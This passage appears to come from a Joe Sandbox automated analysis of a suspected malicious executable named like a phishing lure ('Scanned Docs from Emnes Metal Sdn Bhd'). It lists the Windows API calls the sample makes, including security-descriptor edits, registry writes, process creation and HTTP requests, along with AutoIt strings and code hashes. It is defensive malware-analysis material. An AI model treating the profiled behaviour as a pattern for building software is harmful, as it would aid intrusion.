                                                      • Opcode ID: 42120b2609c18a693b20c0a436164c045a23d20faeeb12031d75bd36844d1dc3
                                                      • Instruction ID: cb1b63d06969cdf15d247d78b6267c1c185342539eb3170e05eed5cb73a7a2ef
                                                      • Opcode Fuzzy Hash: 42120b2609c18a693b20c0a436164c045a23d20faeeb12031d75bd36844d1dc3
                                                      • Instruction Fuzzy Hash: D5B17C31A5020A9FDF15DFA8C849BEE7BB5FB48315F14412AFA15EB2A0DB74A850CF50
                                                      APIs
                                                        • Part of subcall function 002E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002E1114
                                                        • Part of subcall function 002E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E1120
                                                        • Part of subcall function 002E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E112F
                                                        • Part of subcall function 002E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E1136
                                                        • Part of subcall function 002E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002E114D
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002E0DF5
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002E0E29
                                                      • GetLengthSid.ADVAPI32(?), ref: 002E0E40
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 002E0E7A
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002E0E96
                                                      • GetLengthSid.ADVAPI32(?), ref: 002E0EAD
                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 002E0EB5
                                                      • HeapAlloc.KERNEL32(00000000), ref: 002E0EBC
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002E0EDD
                                                      • CopySid.ADVAPI32(00000000), ref: 002E0EE4
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002E0F13
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002E0F35
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002E0F47
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E0F6E
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0F75
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E0F7E
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0F85
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E0F8E
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0F95
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 002E0FA1
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0FA8
                                                        • Part of subcall function 002E1193: GetProcessHeap.KERNEL32(00000008,002E0BB1,?,00000000,?,002E0BB1,?), ref: 002E11A1
                                                        • Part of subcall function 002E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,002E0BB1,?), ref: 002E11A8
                                                        • Part of subcall function 002E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002E0BB1,?), ref: 002E11B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                      • String ID:
                                                      • API String ID: 4175595110-0
                                                      • Opcode ID: 7ee07050aebab8a15665e929f6029561eaa01cf3bc442610abe2b2ac3b0a46c0
                                                      • Instruction ID: eadbd12e824a06d156dd015004b4648f78c9c3069b170be0bb7d0aaf6a638906
                                                      • Opcode Fuzzy Hash: 7ee07050aebab8a15665e929f6029561eaa01cf3bc442610abe2b2ac3b0a46c0
                                                      • Instruction Fuzzy Hash: 5771907199024AABDF21DFA5DC84FEEBBBCBF08300F448125F919A6151DB709D65CB60
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0030C4BD
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0031CC08,00000000,?,00000000,?,?), ref: 0030C544
                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0030C5A4
                                                      • _wcslen.LIBCMT ref: 0030C5F4
                                                      • _wcslen.LIBCMT ref: 0030C66F
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0030C6B2
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0030C7C1
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0030C84D
                                                      • RegCloseKey.ADVAPI32(?), ref: 0030C881
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0030C88E
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0030C960
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 9721498-966354055
                                                      • Opcode ID: 61e095b4ddb536cc0b3a56583919c8f3090400b97eb99afdc5ff76c31fec4481
                                                      • Instruction ID: 4f46d22243e4332c7b00eb8d6baadded2bbcc3ada4fc4df2116cca80f2497b28
                                                      • Opcode Fuzzy Hash: 61e095b4ddb536cc0b3a56583919c8f3090400b97eb99afdc5ff76c31fec4481
                                                      • Instruction Fuzzy Hash: A91298392252009FD715EF14C891A2AB7E5FF88714F15899CF89A9B3A2DB30EC51CF91
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 003109C6
                                                      • _wcslen.LIBCMT ref: 00310A01
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00310A54
                                                      • _wcslen.LIBCMT ref: 00310A8A
                                                      • _wcslen.LIBCMT ref: 00310B06
                                                      • _wcslen.LIBCMT ref: 00310B81
                                                        • Part of subcall function 0029F9F2: _wcslen.LIBCMT ref: 0029F9FD
                                                        • Part of subcall function 002E2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002E2BFA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 1103490817-4258414348
                                                      • Opcode ID: 9b7105cdf340ddeffad41bee213a713df18355c5e7e28ca6dbe473cfa29137c4
                                                      • Instruction ID: 1123fed7398808e1396e7b1acea27f81d1113725f5407371868d7dd62b163848
                                                      • Opcode Fuzzy Hash: 9b7105cdf340ddeffad41bee213a713df18355c5e7e28ca6dbe473cfa29137c4
                                                      • Instruction Fuzzy Hash: 98E1DC352183018FCB19EF24C4508AAB7E5FF98304B51895CF896AB7A2DB70ED95CF81
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 1256254125-909552448
                                                      • Opcode ID: 916de4398a53310d73eafe39f94b4a674dc2563a4c55d79f0dfce1804daf0a76
                                                      • Instruction ID: b617dc2c3328e53415730b334d7ef6ebeccecd927878b79fe93ef7f5763d5e87
                                                      • Opcode Fuzzy Hash: 916de4398a53310d73eafe39f94b4a674dc2563a4c55d79f0dfce1804daf0a76
                                                      • Instruction Fuzzy Hash: 6E71253263116A8BCB22DF7CC9615BF3395ABA1750B261724FC569B2C0EB34DD5187A0
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 0031835A
                                                      • _wcslen.LIBCMT ref: 0031836E
                                                      • _wcslen.LIBCMT ref: 00318391
                                                      • _wcslen.LIBCMT ref: 003183B4
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003183F2
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0031361A,?), ref: 0031844E
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00318487
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003184CA
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00318501
                                                      • FreeLibrary.KERNEL32(?), ref: 0031850D
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0031851D
                                                      • DestroyIcon.USER32(?), ref: 0031852C
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00318549
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00318555
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                      • String ID: .dll$.exe$.icl
                                                      • API String ID: 799131459-1154884017
                                                      • Opcode ID: e4e0cb9a3e3acee77aa30184e3450db8a92b49f720eac68d7e2099b8fdc7d9b2
                                                      • Instruction ID: aa0fe2b62b3674384745ad273404e9817b227c7947cf0027876cbf670a5cef98
                                                      • Opcode Fuzzy Hash: e4e0cb9a3e3acee77aa30184e3450db8a92b49f720eac68d7e2099b8fdc7d9b2
                                                      • Instruction Fuzzy Hash: 5A61BC71550205BAEB1A9F65CC81BFE77ACFB09B21F108609F815D60D1DFB4AA90CBA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 0-1645009161
                                                      • Opcode ID: 41fed5ef5abb5c37c1e9f0c67d5fb586fb0508dac45d24a0fd946a815e82a873
                                                      • Instruction ID: 2bc470ba1ff919515e76a5f457e613dedf6370ca56337d5d8cd03805cdca46b8
                                                      • Opcode Fuzzy Hash: 41fed5ef5abb5c37c1e9f0c67d5fb586fb0508dac45d24a0fd946a815e82a873
                                                      • Instruction Fuzzy Hash: AB810675675616ABDB11BF60CD42FEE77A8AF15300F144024FC08AA1D6EB70D9B1CBA1
                                                      APIs
                                                      • LoadIconW.USER32(00000063), ref: 002E5A2E
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002E5A40
                                                      • SetWindowTextW.USER32(?,?), ref: 002E5A57
                                                      • GetDlgItem.USER32(?,000003EA), ref: 002E5A6C
                                                      • SetWindowTextW.USER32(00000000,?), ref: 002E5A72
                                                      • GetDlgItem.USER32(?,000003E9), ref: 002E5A82
                                                      • SetWindowTextW.USER32(00000000,?), ref: 002E5A88
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002E5AA9
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002E5AC3
                                                      • GetWindowRect.USER32(?,?), ref: 002E5ACC
                                                      • _wcslen.LIBCMT ref: 002E5B33
                                                      • SetWindowTextW.USER32(?,?), ref: 002E5B6F
                                                      • GetDesktopWindow.USER32 ref: 002E5B75
                                                      • GetWindowRect.USER32(00000000), ref: 002E5B7C
                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 002E5BD3
                                                      • GetClientRect.USER32(?,?), ref: 002E5BE0
                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 002E5C05
                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002E5C2F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                      • String ID:
                                                      • API String ID: 895679908-0
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[4
                                                      • API String ID: 176396367-3247088587
                                                      APIs
                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 002A00C6
                                                        • Part of subcall function 002A00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0035070C,00000FA0,111BB98E,?,?,?,?,002C23B3,000000FF), ref: 002A011C
                                                        • Part of subcall function 002A00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,002C23B3,000000FF), ref: 002A0127
                                                        • Part of subcall function 002A00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,002C23B3,000000FF), ref: 002A0138
                                                        • Part of subcall function 002A00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 002A014E
                                                        • Part of subcall function 002A00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 002A015C
                                                        • Part of subcall function 002A00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 002A016A
                                                        • Part of subcall function 002A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002A0195
                                                        • Part of subcall function 002A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002A01A0
                                                      • ___scrt_fastfail.LIBCMT ref: 002A00E7
                                                        • Part of subcall function 002A00A3: __onexit.LIBCMT ref: 002A00A9
                                                      Strings
                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 002A0122
                                                      • kernel32.dll, xrefs: 002A0133
                                                      • WakeAllConditionVariable, xrefs: 002A0162
                                                      • SleepConditionVariableCS, xrefs: 002A0154
                                                      • InitializeConditionVariable, xrefs: 002A0148
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                      • API String ID: 66158676-1714406822
                                                      APIs
                                                      • CharLowerBuffW.USER32(00000000,00000000,0031CC08), ref: 002F4527
                                                      • _wcslen.LIBCMT ref: 002F453B
                                                      • _wcslen.LIBCMT ref: 002F4599
                                                      • _wcslen.LIBCMT ref: 002F45F4
                                                      • _wcslen.LIBCMT ref: 002F463F
                                                      • _wcslen.LIBCMT ref: 002F46A7
                                                        • Part of subcall function 0029F9F2: _wcslen.LIBCMT ref: 0029F9FD
                                                      • GetDriveTypeW.KERNEL32(?,00346BF0,00000061), ref: 002F4743
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2055661098-1000479233
                                                      APIs
                                                        • Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2
                                                      • DragQueryPoint.SHELL32(?,?), ref: 00319147
                                                        • Part of subcall function 00317674: ClientToScreen.USER32(?,?), ref: 0031769A
                                                        • Part of subcall function 00317674: GetWindowRect.USER32(?,?), ref: 00317710
                                                        • Part of subcall function 00317674: PtInRect.USER32(?,?,00318B89), ref: 00317720
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 003191B0
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003191BB
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003191DE
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00319225
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0031923E
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00319255
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00319277
                                                      • DragFinish.SHELL32(?), ref: 0031927E
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00319371
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#5
                                                      • API String ID: 221274066-653977726
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 0030B198
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0030B1B0
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0030B1D4
                                                      • _wcslen.LIBCMT ref: 0030B200
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0030B214
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0030B236
                                                      • _wcslen.LIBCMT ref: 0030B332
                                                        • Part of subcall function 002F05A7: GetStdHandle.KERNEL32(000000F6), ref: 002F05C6
                                                      • _wcslen.LIBCMT ref: 0030B34B
                                                      • _wcslen.LIBCMT ref: 0030B366
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0030B3B6
                                                      • GetLastError.KERNEL32(00000000), ref: 0030B407
                                                      • CloseHandle.KERNEL32(?), ref: 0030B439
                                                      • CloseHandle.KERNEL32(00000000), ref: 0030B44A
                                                      • CloseHandle.KERNEL32(00000000), ref: 0030B45C
                                                      • CloseHandle.KERNEL32(00000000), ref: 0030B46E
                                                      • CloseHandle.KERNEL32(?), ref: 0030B4E3
                                                      Similarity
                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 2178637699-0
                                                      APIs
                                                      • GetMenuItemCount.USER32(00351990), ref: 002C2F8D
                                                      • GetMenuItemCount.USER32(00351990), ref: 002C303D
                                                      • GetCursorPos.USER32(?), ref: 002C3081
                                                      • SetForegroundWindow.USER32(00000000), ref: 002C308A
                                                      • TrackPopupMenuEx.USER32(00351990,00000000,?,00000000,00000000,00000000), ref: 002C309D
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002C30A9
                                                      Strings
                                                      Similarity
                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                      • String ID: 0
                                                      • API String ID: 36266755-4108050209
                                                      APIs
                                                      • DestroyWindow.USER32(?,?), ref: 00316DEB
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00316E5F
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00316E81
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00316E94
                                                      • DestroyWindow.USER32(?), ref: 00316EB5
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00280000,00000000), ref: 00316EE4
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00316EFD
                                                      • GetDesktopWindow.USER32 ref: 00316F16
                                                      • GetWindowRect.USER32(00000000), ref: 00316F1D
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00316F35
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00316F4D
                                                        • Part of subcall function 00299944: GetWindowLongW.USER32(?,000000EB), ref: 00299952
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                      • String ID: 0$tooltips_class32
                                                      • API String ID: 2429346358-3619404913
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002FC4B0
                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 002FC4C3
                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 002FC4D7
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002FC4F0
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 002FC533
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002FC549
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002FC554
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002FC584
                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 002FC5DC
                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 002FC5F0
                                                      • InternetCloseHandle.WININET(00000000), ref: 002FC5FB
                                                      Strings
                                                      Similarity
                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                      • String ID:
                                                      • API String ID: 3800310941-3916222277
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00318592
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 003185A2
                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 003185AD
                                                      • CloseHandle.KERNEL32(00000000), ref: 003185BA
                                                      • GlobalLock.KERNEL32(00000000), ref: 003185C8
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003185D7
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 003185E0
                                                      • CloseHandle.KERNEL32(00000000), ref: 003185E7
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 003185F8
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,0031FC38,?), ref: 00318611
                                                      • GlobalFree.KERNEL32(00000000), ref: 00318621
                                                      • GetObjectW.GDI32(?,00000018,000000FF), ref: 00318641
                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00318671
                                                      • DeleteObject.GDI32(00000000), ref: 00318699
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003186AF
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3840717409-0
                                                      • Opcode ID: 4a187bea2ea3fac36b6f87e2d5ce8812d27cc165af5eaec11d739721eef47d22
                                                      • Instruction ID: 069112070ad4aaca79b7a6dc96b51b37ec1dc7a81286daa66174655a177b27f6
                                                      • Opcode Fuzzy Hash: 4a187bea2ea3fac36b6f87e2d5ce8812d27cc165af5eaec11d739721eef47d22
                                                      • Instruction Fuzzy Hash: D4412775640208AFDB129FA5CC88EEA7BBDEF8EB11F148458F905E7260DB309D41CB64
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000000), ref: 002F1502
                                                      • VariantCopy.OLEAUT32(?,?), ref: 002F150B
                                                      • VariantClear.OLEAUT32(?), ref: 002F1517
                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002F15FB
                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 002F1657
                                                      • VariantInit.OLEAUT32(?), ref: 002F1708
                                                      • SysFreeString.OLEAUT32(?), ref: 002F178C
                                                      • VariantClear.OLEAUT32(?), ref: 002F17D8
                                                      • VariantClear.OLEAUT32(?), ref: 002F17E7
                                                      • VariantInit.OLEAUT32(00000000), ref: 002F1823
                                                      Strings
                                                      Similarity
                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                      • API String ID: 1234038744-3931177956
                                                      • Opcode ID: 2d687d2aa701cff50afe9feadd62f3f83d5d096ca7ce39a1ae46ca158fbeb280
                                                      • Instruction ID: f0db4b024f10b5211e1e6d6762d49c6ea8f19924ac3e516a35ffc686638f786e
                                                      • Opcode Fuzzy Hash: 2d687d2aa701cff50afe9feadd62f3f83d5d096ca7ce39a1ae46ca158fbeb280
                                                      • Instruction Fuzzy Hash: 15D10272A20219DBDF04AF65D885BB9F7B6BF45740F908066E606AB180DB70DC70DBA1
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                        • Part of subcall function 0030C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0030B6AE,?,?), ref: 0030C9B5
